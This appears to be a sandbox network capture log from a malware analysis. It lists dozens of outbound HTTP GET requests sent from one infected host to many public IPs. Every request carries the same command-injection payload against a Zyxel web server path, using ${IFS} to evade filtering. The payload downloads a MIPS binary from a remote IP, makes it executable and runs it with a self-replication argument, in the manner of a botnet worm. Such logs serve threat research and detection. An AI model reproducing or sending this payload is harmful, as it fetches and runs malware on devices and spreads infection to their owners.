                                                        Feb 2, 2024 06:21:19.115473032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6709192.168.2.145178692.139.255.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115514040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6710192.168.2.1457856220.132.92.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115546942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6711192.168.2.1446128151.82.109.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115586042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6712192.168.2.1433174125.73.182.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115605116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6713192.168.2.14595202.144.173.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115633965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6714192.168.2.1435008177.76.56.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115674973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6715192.168.2.1447862213.252.87.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115720034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6716192.168.2.14336764.166.11.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115767956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6717192.168.2.1449456119.194.78.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115788937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6718192.168.2.1456032103.58.207.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115828037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6719192.168.2.1438918152.90.27.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115860939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6720192.168.2.1458454174.54.181.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115889072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6721192.168.2.1445028191.240.250.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115931034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6722192.168.2.145545092.179.85.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115971088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6723192.168.2.144182682.202.134.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.115984917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6724192.168.2.1453748184.22.162.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116041899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6725192.168.2.143382477.65.131.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116080046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6726192.168.2.1456432190.12.6.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116107941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6727192.168.2.145678077.166.64.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116148949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6728192.168.2.143872459.52.251.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116189957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6729192.168.2.1438288143.185.19.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116238117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6730192.168.2.1438310210.251.56.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116272926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6731192.168.2.1451040129.54.254.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116313934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6732192.168.2.1441206144.228.84.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116317034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6733192.168.2.1437102172.72.153.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116353035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6734192.168.2.146088437.150.100.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116415024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6735192.168.2.1438494155.75.224.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116446972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6736192.168.2.1442102187.188.230.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116478920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6737192.168.2.144033218.43.46.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116539955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6738192.168.2.1444870157.97.191.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116588116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6739192.168.2.1441764169.90.189.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116632938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6740192.168.2.145680248.65.53.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116669893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6741192.168.2.144513445.252.94.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116705894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6742192.168.2.145932041.243.29.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116725922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6743192.168.2.1446818120.149.197.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116791964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6744192.168.2.1455414166.76.110.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116828918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6745192.168.2.144162692.7.127.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116863966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6746192.168.2.144646892.35.25.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116898060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6747192.168.2.1441530124.14.177.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116950989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6748192.168.2.143299871.233.80.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.116991997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6749192.168.2.1434446109.191.44.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117038965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6750192.168.2.1443356117.203.124.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117053032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6751192.168.2.1451888206.212.219.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117083073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6752192.168.2.1446296124.254.51.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117160082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6753192.168.2.144965649.190.242.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117187023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6754192.168.2.1456054184.100.111.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117221117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6755192.168.2.145931627.238.144.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117260933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6756192.168.2.143430288.87.165.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117316008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6757192.168.2.1446102150.122.53.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117351055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6758192.168.2.143694684.154.62.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117373943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6759192.168.2.144709862.247.118.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117439032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6760192.168.2.1449364101.38.88.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117470026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6761192.168.2.1452190110.48.160.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117510080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6762192.168.2.143718895.19.194.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117548943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6763192.168.2.1442990117.53.111.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117582083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6764192.168.2.1442776173.33.85.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117618084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6765192.168.2.1433744142.19.157.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117671013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6766192.168.2.1439050164.15.83.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117702007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6767192.168.2.1455044142.164.230.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117742062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6768192.168.2.145402053.231.89.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117784977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6769192.168.2.1456840157.121.62.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117826939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6770192.168.2.1444384162.190.255.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.117871046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6771192.168.2.1459758115.8.180.194443
                                                        TimestampBytes transferredDirectionData
